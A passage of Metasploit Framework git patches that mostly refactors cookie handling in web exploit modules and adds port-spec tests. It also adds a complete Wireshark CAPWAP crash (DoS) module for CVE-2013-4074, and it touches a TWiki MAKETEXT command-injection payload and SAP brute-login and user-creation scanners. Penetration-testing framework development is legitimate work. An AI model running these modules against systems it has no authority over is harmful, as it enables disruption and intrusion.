Msf::Exploit::Remote return '' if !res nsp = res.body.scan(/<input type='hidden' name='nsp' value='(.+)'>/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 370/853] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") From 71e2d19040df63bf51b1f123532cc6bcc4f00b8b Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 24 May 2014 18:53:10 +0100 Subject: [PATCH 371/853] Adapted to auxiliary modules structure --- modules/auxiliary/dos/wireshark/capwap.rb | 54 +++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/capwap.rb diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb new file mode 100644 index 0000000000..12feb83d96 --- /dev/null +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -0,0 +1,54 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Udp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DisclosureDate' => 'Apr 28 2014')) + + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def run + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # the dissector crash + # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt + # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 + buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15) + udp_sock.put(buf) + + disconnect_udp + + end +end From 9f166b87f6479b5639862cb8ea99fcd8c332e87d Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 24 May 2014 18:58:36 +0100 Subject: [PATCH 372/853] Changed the description --- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 12feb83d96..6555ab5dcf 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Exploit and msf module + 'j0sm1', # Auxiliary msf module 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => From 4fc6e402dce1b1f24e1c9bc1e620468b6ef70c18 Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:44:50 +0200 Subject: [PATCH 373/853] Allow port 0 --- lib/rex/socket.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index ba510c5a80..db8206ce75 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -538,11 +538,11 @@ module Socket end if ports.empty? and not remove.empty? then - ports = 1.upto 65535 + ports = 0.upto 65535 end # Sort, and remove dups and invalid ports - ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p } + ports.sort.uniq.delete_if { |p| p < 0 or p > 65535 or remove.include? p } end # @@ -555,7 +555,7 @@ module Socket lastp = nil parr.uniq.sort{|a,b| a<=>b}.map{|a| a.to_i}.each do |n| - next if (n < 1 or n > 65535) + next if (n < 0 or n > 65535) if not lastp range = [n] lastp = n From fc5436417b8f431c8635b6a785b024859eedd223 Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:45:21 +0200 Subject: [PATCH 374/853] Simplification --- lib/rex/socket.rb | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index db8206ce75..e4aeb660ca 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -514,13 +514,13 @@ module Socket # Build ports array from port specification pspec.split(/,/).each do |item| + target = ports + item.strip! - if item.starts_with? '!' then - negate = true + if item.start_with? '!' item.delete! '!' - else - negate = false + target = remove end start, stop = item.split(/-/).map { |p| p.to_i } @@ -530,11 +530,7 @@ module Socket start, stop = stop, start if stop < start - if negate then - start.upto(stop) { |p| remove << p } - else - start.upto(stop) { |p| ports << p } - end + start.upto(stop) { |p| target << p } end if ports.empty? and not remove.empty? then From 2b75a53c9382f33d39555cdde454da8fbed749ae Mon Sep 17 00:00:00 2001 From: Lutz Wolf <lutz.wolf@damogran.de> Date: Sat, 24 May 2014 23:46:26 +0200 Subject: [PATCH 375/853] Add basic rspec for portspec_to_portlist --- spec/lib/rex/socket_spec.rb | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/spec/lib/rex/socket_spec.rb b/spec/lib/rex/socket_spec.rb index 41c1abde79..3bc99de1bc 100644 --- a/spec/lib/rex/socket_spec.rb +++ b/spec/lib/rex/socket_spec.rb @@ -163,4 +163,35 @@ describe Rex::Socket do end end + + describe '.portspec_to_portlist' do + + portspec = '-1,0-10,!2-5,!7,65530-,65536' + context "'#{portspec}'" do + + subject { described_class.portspec_to_portlist portspec } + + it { should be_a(Array) } + + not_included = [] + not_included << -1 + not_included << 65536 + not_included.concat (2..5).to_a + not_included << 7 + not_included.each do |item| + it { should_not include item } + end + + included = [] + included << -1 + included.concat (0..10).to_a + included.concat (65530..65535).to_a + included << 65536 + included = included - not_included + included.each do |item| + it { should include item } + end + end + end + end From 76b9273f10e79568684a10ee740a1ba231dd6f9e Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 08:07:38 -0500 Subject: [PATCH 376/853] Improve reliability of have_powershell I have a case where on a Windows 2008 R2 host with PowerShell 2.0 the 'have_powershell' method times out. When I interactively run the command I find that the output stops after the PowerShell command and the token from 'cmd_exec' is NOT displayed. When I hit return the shell then processes the '&echo <randomstring>' and generates the token that 'cmd_exec' was looking for. I tried various versions of the PowerShell command string such as 'Get-Host;Exit(0)', '$PSVErsionTable.PSVersion', and '-Command Get-Host' but was unable to change the behavior. I found that adding 'echo. | ' simulated pressing enter and did not disrupt the results on this host or on another host where the 'have_powershell' method functioned as expected. There may be a better solution, but this was the only one that I could find. --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 33b6fca9f8..a438171662 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -19,7 +19,7 @@ module Powershell # Returns true if powershell is installed # def have_powershell? - cmd_out = cmd_exec("powershell get-host") + cmd_out = cmd_exec("echo. | powershell get-host") return true if cmd_out =~ /Name.*Version.*InstanceID/ return false end From 42a17cc08536239fffd54dcfde2532ebe04ae811 Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 08:59:42 -0500 Subject: [PATCH 377/853] Update powershell.rb To be clear, the shell that was tested with was 'windows/shell_reverse_tcp' delivered via 'exploit/windows/smb/psexec' Additional changes required to fix regex to support the multiline output. Also, InstanceId uses a lower case 'D' on the platforms I tested - PowerShell 2.0 on Windows 2003, Windows 7, Windows 2008 R2 as well as PowerShell 4.0 on Windows 2012 R2. This method doesn't appear to be used anywhere in the Metasploit codebase currently. --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index a438171662..d063846d88 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -20,7 +20,7 @@ module Powershell # def have_powershell? cmd_out = cmd_exec("echo. | powershell get-host") - return true if cmd_out =~ /Name.*Version.*InstanceID/ + return true if cmd_out =~ /Name.*Version.*InstanceId/m return false end From da0a9f66ea93307cf2985dab3f75cf5611932cc8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Sun, 25 May 2014 19:29:39 +0200 Subject: [PATCH 378/853] Resolved all msftidy vars_get warnings --- lib/rex/proto/http/client_request.rb | 10 +++++-- .../scanner/sap/sap_soap_bapi_user_create1.rb | 16 +++++++---- .../scanner/sap/sap_soap_rfc_brute_login.rb | 15 ++++++---- ...fc_dbmcli_sxpg_call_system_command_exec.rb | 10 +++++-- .../sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 10 +++++-- .../scanner/sap/sap_soap_rfc_ping.rb | 17 ++++++----- .../scanner/sap/sap_soap_rfc_read_table.rb | 17 +++++------ .../sap_soap_rfc_susr_rfc_user_interface.rb | 17 ++++++----- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 14 ++++++---- .../sap/sap_soap_rfc_sxpg_command_exec.rb | 8 ++++-- .../scanner/sap/sap_soap_rfc_system_info.rb | 8 ++++-- .../sap/sap_soap_th_saprel_disclosure.rb | 10 +++++-- .../linux/http/openfiler_networkcard_exec.rb | 8 ++++-- .../linux/http/sophos_wpa_iface_exec.rb | 26 ++++++++++++----- .../linux/http/zen_load_balancer_exec.rb | 14 ++++++---- .../multi/http/hyperic_hq_script_console.rb | 12 ++++++-- .../multi/http/openfire_auth_bypass.rb | 28 +++++++++++-------- .../http/adobe_robohelper_authbypass.rb | 18 ++++++------ .../http/desktopcentral_file_upload.rb | 14 +++++++--- .../windows/http/hp_nnm_ovalarm_lang.rb | 9 ++++-- .../exploits/windows/http/sybase_easerver.rb | 11 +++++--- .../windows/http/zenworks_uploadservlet.rb | 21 +++++++------- .../lib/rex/proto/http/client_request_spec.rb | 6 ++++ 23 files changed, 206 insertions(+), 113 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2758d8fa77..4336909510 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -112,12 +112,16 @@ class ClientRequest opts['vars_get'].each_pair do |var,val| var = var.to_s - val = val.to_s qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - qstr << '=' - qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + # support get paraemter without value + # Example: uri?parameter + if val + val = val.to_s + qstr << '=' + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + end end if (opts['pad_post_params']) diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 7a9535e6a9..ca96bb83eb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -70,17 +70,21 @@ class Metasploit4 < Msf::Auxiliary data << '</env:Envelope>' begin print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'") + res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } }) if res and res.code == 200 if res.body =~ /<h1>Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index d19a43b7c7..142697e92b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -118,16 +118,19 @@ class Metasploit4 < Msf::Auxiliary data << '</env:Envelope>' begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(username, password), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } }) if res and res.code == 200 report_auth_info( diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 72460a04fc..c20283e921 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index b8ec123d75..fc110dbd7b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index ec95f65519..be20e21b59 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 if res and res.body =~ /<h1>Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - login failed!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index d7e7ad065b..3d19045911 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -83,19 +83,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], - #'Authorization' => 'Basic ' + user_pass, - #'Content-Type' => - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. if res.body =~ /<h1>Logon failed<\/h1>/ diff --git 